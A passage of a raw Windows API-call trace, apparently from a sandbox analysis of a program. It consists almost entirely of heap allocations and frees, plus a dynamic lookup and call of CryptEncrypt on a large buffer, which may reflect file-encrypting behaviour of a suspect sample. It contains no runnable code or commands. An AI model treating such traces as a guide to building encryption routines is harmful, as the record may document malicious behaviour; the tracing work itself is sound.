0x2e51e50 [0265.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0265.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0265.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0265.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0265.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0265.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0265.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0265.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0265.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0265.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0265.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0265.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0265.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0265.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0265.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0265.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0265.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0265.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0265.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0265.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0265.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0265.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0265.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0265.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0265.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0265.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0265.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0265.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0265.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0265.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0265.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0265.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51d60 [0265.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51d60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0265.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0265.302] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0265.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54418 [0265.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0265.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0265.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0265.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0265.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0265.303] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x153c2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x153c8) returned 1 [0265.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0265.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0265.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0265.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0265.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0265.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0265.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0265.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0265.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0265.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0265.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0265.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0265.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0265.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0265.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0265.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0265.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0265.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0265.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0265.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0265.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0265.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0265.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0265.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0265.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0265.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0265.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0265.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0265.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0265.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0265.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0265.310] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0265.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0265.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0265.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0265.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0265.311] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0265.311] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0265.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0265.311] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0265.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0265.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0265.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0265.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0265.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0265.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.312] HeapFree (in: hHeap=0x970000, 